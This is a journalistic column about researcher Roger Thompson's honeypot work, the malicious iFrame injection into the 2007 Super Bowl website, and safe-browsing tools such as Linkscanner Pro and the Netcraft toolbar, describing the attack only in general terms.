Not too long ago, security researcher Roger Thompson had an epiphany. He already had his global distributed network of honeypots well established and had detected a more than a few breaking viruses. But the days of seeing new threats such as Sasser and Netsky, both of which lit up his switchboard instantly, were over. Now attacks light up one honeypot in one part of the world, then in another part, then another. The new attacks, he realized, were increasingly targeted and were being carefully meted out to avoid detection by honeypot networks such as his own. The attacks today are being discovered only by reading the honeypot log files well after the fact. Thompson realized that the current model was backward. Rather than sitting back and waiting for attacks to come to him, he needed a more active model; he needed to go and find the attacks as they are happening. And it's a good thing he made this paradigm shift. Shortly before the 2007 Super Bowl, thousands of visitors to the site quickly discovered how a perfectly legit Web site could also be the source of rather nasty Trojan horses.
Super Bowl exploits
Injecting malicious code onto legitimate Web sites is a deceptively simple to do--assuming the Web site is vulnerable, that is.
Injecting malicious code onto legitimate Web sites is a deceptively simple to do, assuming the Web site is vulnerable, that is. A criminal hacker needs little more than an Internet browser to accomplish his task. The criminal hackers who did this apparently surfed the Super Bowl site, appended the existing URL with a script tag and some code calling their exploit server, then revisited the site. As the HTTP page request passed to the Web server, the server read the script command and added the malicious iFrame code to the legitimate Super Bowl Web site. Future visitors to the site would now download that iFrame code.
Not a phishing site
There are tools available that will check and verify the relative security of Web sites. One, McAfee SiteAdvisor, ranks the relative safety of thousands of Web sites. But the defaced Super Bowl site was not a phishing site, so SiteAdvisor gave its healthy seal of approval. Thompson's own tool, Linkscanner Pro, actively scans the code as it is, reading the code as it's passed back from the Web server to your Web browser; it identified the exploit code and blocked it, while allow users to access the site safely.
Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world.
Whack a mole
Thompson, and others I spoke with at RSA, believe there are perhaps a handful of true malicious code geniuses working in the world today. You'll probably never know their names, but you might run across their handiwork from time to time on the Internet. Protecting these guys are Internet gangs that buy the malicious code, then distribute it by defacing Web sites such as the Super Bowl's or the CDC's to lure unsuspecting people into compromising their machines. Once compromised, a desktop PC could become part of a botnet, a spam relay, or a target of identity theft.
Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world; indeed, the infected pages identified by Thompson's Linkscanner Pro often point to just a few dozen Web servers. If Thompson and others do shut down one exploit server site, the Internet gangs start using a different URL instead. Often the exploit servers are hosted in parts of the world where laws, language, or even basic understanding of the problem make it hard to remove the malicious content from the Internet.
Prevention Are you using a safe browsing tool. Why or why not? Will you start using one now? Talk back to me.
After using it for more than a week, I found Thompson's Linkscanner Pro is great at stopping the malicious code, but I also found it missed several reported phishing sites; it wasn't really designed for that. To identify and block phishing site, use the free Netcraft toolbar alongside Thompson's tool. I find that Netcraft consistently blocks suspected phishing sites better than some of the paid antiphishing protection.